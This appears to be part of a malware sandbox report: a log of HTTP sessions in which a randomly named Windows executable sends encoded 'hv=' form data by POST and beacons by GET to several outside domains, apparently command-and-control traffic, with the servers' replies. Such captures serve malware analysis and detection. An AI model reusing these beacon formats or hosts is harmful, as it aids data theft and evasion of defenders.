                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    30 | 192.168.2.8 | 49744 | 35.241.41.54 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:39.032617092 CEST | 622 | OUT | POST /44zl/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ngkwnq.xyz
                                                    Origin: http://www.ngkwnq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.ngkwnq.xyz/44zl/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=RRfGBXjMk0r2+hwAFxp4ce1I2YFzIi/iOJWqb/sinKCOPo/lYmtgUlvfoqtSoL0uZP4hyqqdhOld7Km0C8XjuEeMJhhZdPFC7cI4UrqM51yq6axtWhR9XJE0nrVUMg2HwcAFduMcozE9UJYIOFEuuUbdD36Xi4BJgLPmlFmbJyCvYNNgx8LjIy8SzOIDDnVm/pF2PccEq7GKNvmqUnbiVFj61bEg
                                                    Jul 1, 2024 15:46:39.689910889 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:46:39 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:46:39.692758083 CEST | 157 | IN
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    31 | 192.168.2.8 | 49745 | 35.241.41.54 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:41.568326950 CEST | 1639 | OUT | POST /44zl/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ngkwnq.xyz
                                                    Origin: http://www.ngkwnq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.ngkwnq.xyz/44zl/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:42.231754065 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:46:42 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:46:42.234688044 CEST | 157 | IN
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    32 | 192.168.2.8 | 49746 | 35.241.41.54 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:44.099317074 CEST | 347 | OUT | GET /44zl/?hv=cT3mCg7Cmib/+TsqKgcGcLNa3rN7XS3dP4LITboVuuCqI7qZSFFYJV7Jt59+pqQMU8QRjoSmjIZC25OqP8KY8gmteTpLVZlDreUlLLyNnWL1wa1Nczp2K6xKprp1RRbIsA==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.ngkwnq.xyz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:44.742984056 CEST | 300 | IN | HTTP/1.1 200 OK
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:46:44 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 5161
                                                    Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                    Vary: Accept-Encoding
                                                    ETag: "65a4939c-1429"
                                                    Cache-Control: no-cache
                                                    Accept-Ranges: bytes
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:46:44.756393909 CEST | 1236 | IN
                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                    Jul 1, 2024 15:46:44.756422997 CEST | 1236 | IN
                                                    Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                                    Jul 1, 2024 15:46:44.756434917 CEST | 1236 | IN
                                                    Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                                                    Jul 1, 2024 15:46:44.756566048 CEST | 1236 | IN
                                                    Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                                                    Jul 1, 2024 15:46:44.756586075 CEST | 217 | IN
                                                    Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    33 | 192.168.2.8 | 49747 | 76.223.105.230 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:49.951397896 CEST | 617 | OUT | POST /jtz4/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eoghenluire.com
                                                    Origin: http://www.eoghenluire.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.eoghenluire.com/jtz4/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=m3CwnZHMWbJFO0S+2M5OPNVCrKnfGSKxAVH7i04b0of2SOc6FYZk4tlGcSLyqxCt5flppBZeR5CHD0cT2WtTUMttMhBZYCLgySzcFjlOa2clOJajFjeCI5WVw29C+Ntr//nvZVA0VIBcI1WFgR0jj2Q21Qi3gG9OvEOP5sFLik9Uxudych3cCC70GwrjZ6CwGs6HhZQ=
                                                    Jul 1, 2024 15:46:50.428261995 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    content-type: text/html;charset=utf-8
                                                    content-length: 964
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-d033aba
                                                    x-version: d033aba
                                                    x-siteid: us-east-1
                                                    set-cookie: dps_site_id=us-east-1; path=/
                                                    date: Mon, 01 Jul 2024 13:46:50 GMT
                                                    keep-alive: timeout=5
                                                    connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                    Jul 1, 2024 15:46:50.428694010 CEST | 36 | IN
                                                    Data Ascii: </div></div></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    34 | 192.168.2.8 | 49748 | 76.223.105.230 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:52.487907887 CEST | 637 | OUT | POST /jtz4/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eoghenluire.com
                                                    Origin: http://www.eoghenluire.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.eoghenluire.com/jtz4/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=m3CwnZHMWbJFPVi+6N5OJtVBuKnfIyK1AVb7ixUyhKL2SsU6CZZk7tlGTyLz3BC65eYWpBVeR5WHDxgT2lFQVctrQhBbHSLgySzcFjB3a1slO4qjXCeBBZWUx29Cp9tv//ndZUtRVOFcI0mFug0g4GQw6wjQo0JAi0mwz+ZLr1dh94wYGD/aBCTfGzDVcNfYcPq3/OEpP6WpQb0tZr5IzQzSMH4S
                                                    Jul 1, 2024 15:46:52.961931944 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    content-type: text/html;charset=utf-8
                                                    content-length: 964
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-d033aba
                                                    x-version: d033aba
                                                    x-siteid: us-east-1
                                                    set-cookie: dps_site_id=us-east-1; path=/
                                                    date: Mon, 01 Jul 2024 13:46:52 GMT
                                                    keep-alive: timeout=5
                                                    connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                    Jul 1, 2024 15:46:52.961945057 CEST | 36 | IN
                                                    Data Ascii: </div></div></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    35 | 192.168.2.8 | 49749 | 76.223.105.230 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:55.017518044 CEST | 1654 | OUT | POST /jtz4/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.eoghenluire.com
                                                    Origin: http://www.eoghenluire.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.eoghenluire.com/jtz4/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv= [TRUNCATED]
                                                    Jul 1, 2024 15:46:56.093729973 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    content-type: text/html;charset=utf-8
                                                    content-length: 964
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-d033aba
                                                    x-version: d033aba
                                                    x-siteid: us-east-1
                                                    set-cookie: dps_site_id=us-east-1; path=/
                                                    date: Mon, 01 Jul 2024 13:46:55 GMT
                                                    keep-alive: timeout=5
                                                    connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                    Jul 1, 2024 15:46:56.093740940 CEST | 36 | IN
                                                    Data Ascii: </div></div></body></html>
                                                    Jul 1, 2024 15:46:56.094387054 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    content-type: text/html;charset=utf-8
                                                    content-length: 964
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-d033aba
                                                    x-version: d033aba
                                                    x-siteid: us-east-1
                                                    set-cookie: dps_site_id=us-east-1; path=/
                                                    date: Mon, 01 Jul 2024 13:46:55 GMT
                                                    keep-alive: timeout=5
                                                    connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    36 | 192.168.2.8 | 49750 | 76.223.105.230 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:46:57.548335075 CEST | 352 | OUT | GET /jtz4/?hv=r1qQkpPieaVsNUG68+02NppS6IukHQ6wFXr4oQU+uO/CVftnLbVi7u9JfCXfhwamzeJuyCR7X8qwC2gN3XV8echUBAJmUx7G1CfEdwxlKk1EGrOsAByXTICV/hREjOoViQ==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.eoghenluire.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:46:58.032965899 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    content-type: text/html;charset=utf-8
                                                    content-length: 964
                                                    vary: Accept-Encoding
                                                    server: DPS/2.0.0-beta+sha-d033aba
                                                    x-version: d033aba
                                                    x-siteid: us-east-1
                                                    set-cookie: dps_site_id=us-east-1; path=/
                                                    date: Mon, 01 Jul 2024 13:46:57 GMT
                                                    keep-alive: timeout=5
                                                    connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please contact the site owner.</p> </div>
                                                    Jul 1, 2024 15:46:58.032979012 CEST | 36 | IN
                                                    Data Ascii: </div></div></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    37 | 192.168.2.8 | 49751 | 3.33.130.190 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:47:03.065968037 CEST | 611 | OUT | POST /17ef/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.poodlemum.com
                                                    Origin: http://www.poodlemum.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.poodlemum.com/17ef/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=MmYAH14K1uxr/y5bCskmOhLtE1/oTmgQ5NE6oGsW37XSwGBwgXnI2pDMhSZp5L3rnkJ/2TYSIP1UOM45oCY7xnZ0wWzBjFdcgBm3i04b2DsfKjxx/uqrZlaeBpbNI8GZEkhcejIVR2rgCQTEUDV+L6X6ofIf47/eOcAv4YbVXqT06PdlImloqw9XGpB/8ThBic82LHg=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    38 | 192.168.2.8 | 49752 | 3.33.130.190 | 80 | 5992 | C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 1, 2024 15:47:05.600378036 CEST | 631 | OUT | POST /17ef/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.poodlemum.com
                                                    Origin: http://www.poodlemum.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.poodlemum.com/17ef/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=MmYAH14K1uxr/TJbANkmIBLqLV/oG2gU5N46oEAG3I/SznxwjVPIzpDMuyYhk72lnkVB2TkSIPxUOI059l04w3Z292zDtldcgBm3i0sh2D0fLSBx4/qqUFafGpbNM8GdEkg5eiVwRz3gCV3EUSV9B6X8l/JW5OKaIdMI1Iz3XMPq/5wPSEtupwV8GqpJ5k8p4/sGVQ2kxnpaKb8b1sA5wx0Wetl6


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    39          192.168.2.8  49753        3.33.130.190    80                5992  C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 1, 2024 15:47:08.128249884 CEST  1648               OUT        POST /17ef/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.poodlemum.com
                                                    Origin: http://www.poodlemum.com
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.poodlemum.com/17ef/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    40          192.168.2.8  49754        3.33.130.190    80                5992  C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 1, 2024 15:47:10.657994032 CEST  350                OUT        GET /17ef/?hv=BkwgEDM72plk1SoNdv8pOFX/Y0L1Y0wMy+4dvxwo/Oj/80wh3Wvb7+zqtjdXyImQl2Jnvy48BKhjFvscwh0k3TFr3WzonWtP3CiK72Em1Tp7LQVto/HSEXKZGZ++Ap7pGg==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.poodlemum.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:47:12.043147087 CEST  404                IN         HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 01 Jul 2024 13:47:11 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 264
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hv=BkwgEDM72plk1SoNdv8pOFX/Y0L1Y0wMy+4dvxwo/Oj/80wh3Wvb7+zqtjdXyImQl2Jnvy48BKhjFvscwh0k3TFr3WzonWtP3CiK72Em1Tp7LQVto/HSEXKZGZ++Ap7pGg==&Sbzdb=DvgXWdN"}</script></head></html>


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    41          192.168.2.8  49755        35.244.172.47   80                5992  C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 1, 2024 15:47:17.385404110 CEST  620                OUT        POST /5lw2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ajjmamlllqqq.xyz
                                                    Origin: http://www.ajjmamlllqqq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.ajjmamlllqqq.xyz/5lw2/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=vG6orKyC8dWxHydjhUVWTvNebu4pYJvj7w75oO8+YUHnvLMCvIupbXcKpsaa9HK2rxGyQ+OgLii1TyVpQHOmhByFsdF5yB5acBcl+VaFma0fRzC1thIjvkNUOtRGrJZKrLQf4lIsNWHgjU9HVPCkPNgu7EYKEb/7a4P8fxl63ep6R59Amgv//xqW2mrvS+CooVF4Oco=
                                                    Jul 1, 2024 15:47:18.029994965 CEST  176                IN         HTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:47:17 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:47:18.033622980 CEST  157                IN
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    42          192.168.2.8  49756        35.244.172.47   80                5992  C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 1, 2024 15:47:19.923675060 CEST  640                OUT        POST /5lw2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ajjmamlllqqq.xyz
                                                    Origin: http://www.ajjmamlllqqq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.ajjmamlllqqq.xyz/5lw2/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Ascii: hv=vG6orKyC8dWxGSNjm3NWWPNfH+4pSpuk7w35oMRzYGznupkC+9SpYXcKx8afznK9rxK6Q+igLi21TylpRw6ngRyHj9Fovx5acBcl+Vfuma8fRCS1vEkgiENTGNRGhpYBrLQx4kUCNUPgjQ1HVcajFNgol0ZGPLq3QK3FdCgYwtQDZvQq8Cn58xC92lDZXJfAy2VIQL+YDws3c6FT48ur+RV6VfCA
                                                    Jul 1, 2024 15:47:20.593511105 CEST  176                IN         HTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:47:20 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:47:20.595818996 CEST  157                IN
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    43          192.168.2.8  49757        35.244.172.47   80                5992  C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 1, 2024 15:47:22.457798958 CEST  1657               OUT        POST /5lw2/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.ajjmamlllqqq.xyz
                                                    Origin: http://www.ajjmamlllqqq.xyz
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.ajjmamlllqqq.xyz/5lw2/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:47:23.099662066 CEST  176                IN         HTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:47:22 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:47:23.103111982 CEST  157                IN
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                    44          192.168.2.8  49758        35.244.172.47   80                5992  C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    Timestamp                            Bytes transferred  Direction  Data
                                                    Jul 1, 2024 15:47:24.986584902 CEST  353                OUT        GET /5lw2/?hv=iESIo6eVsdqcOmRYuFlUcr07YKkPV6iF6CPlu5h9EhLBhYFmo+CVfgok2cyX/3C89hOXIPK4L028RRlOYTTbn0S9j8UWgSdZAw9+mXeQ1LVvSh67jDUK/iIxNMtsobgO7w==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.ajjmamlllqqq.xyz
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:47:25.629106045 CEST  300                IN         HTTP/1.1 200 OK
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 01 Jul 2024 13:47:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 5161
                                                    Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                    Vary: Accept-Encoding
                                                    ETag: "65a4939c-1429"
                                                    Cache-Control: no-cache
                                                    Accept-Ranges: bytes
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jul 1, 2024 15:47:25.634210110 CEST  1236               IN
